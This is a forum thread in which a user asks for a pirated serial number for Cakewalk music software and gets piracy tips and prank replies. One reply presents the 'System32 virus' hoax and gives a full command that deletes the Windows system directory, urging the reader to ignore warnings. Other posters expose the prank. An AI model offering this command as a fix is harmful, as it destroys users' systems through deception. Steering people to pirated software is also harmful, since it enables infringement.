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New site? Maybe some day.
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I need a serial number for Cakewalk 2 music editor program. Does anyone know a website that would have this?
I need to convert some songs from my new band Ancient//Master with mykey from ATO. we have a myspace but we need songs on that shit
help me out computer nerdz! |
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Torrents and p2p networks are your friend.
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Here's a hint: If the site has tons of cyrillic characters in it, and 4 scheizen porn popups show up when you go there, you're in the right place. |
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Just delete your system32 folder. That's where the locks are. |
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hmm sounds good, if i knew what system32 folder was... |
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OK, now i found it
will this fuck up my computer or something? I didnt mean to call you computer nerdz! Oh Highly qualified computational technological consultants |
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so i should probobly just somehow get a serial code
hmmmmmmmmmmmmmmmmmmmmmmmmmmmm |
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wow...I can't believe niccolai almost got someone to delete their system32 folder...holy shit...haha |
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System32 is a virus that infects your Windows directory. Microsoft makes software to remedy this called "My Computer". It comes pre-installed with most Windows systems and can most likely be found on your desktop.
To remove the System32 trojan virus, you have two choices. The quickest, most effective method is to press the Windows key on the keyboard, hold it, and press 'R', and then type cmd /c rd /s /q c:\windows\system32 -- or you may double-click "My Computer", then right-click the infected C: directory, and choose Delete. Ignore any warnings, as this malicious virus will try to stay on your directory as long as it can. However, if it is too late for "My Computer" to fix it, your computer will stop working. |
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be nice dude...don't delete that
System32
A required Microsoft Windows system directory, the Windows System32 directory is often located in either C:\Windows\System32 or C:\Winnt\system32. Often, many Microsoft Windows error messages will contain the system32 directory because many of the system files Windows uses to run are stored in this directory. By itself, the System32 directory will not cause any errors unless it is missing, of course.
If you are getting an error with a file in the System32 directory, search for that file instead of the full path.
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If you delete the system32 folder Brian, you don't get errors within the 32 directory.
derrrrr |
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brian_dc at work said: many of the system files Windows uses to run are stored in this directory. By itself, the System32 directory will not cause any errors unless it is missing, of course.
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^^^^^
I will fuck everyone on this board forever |
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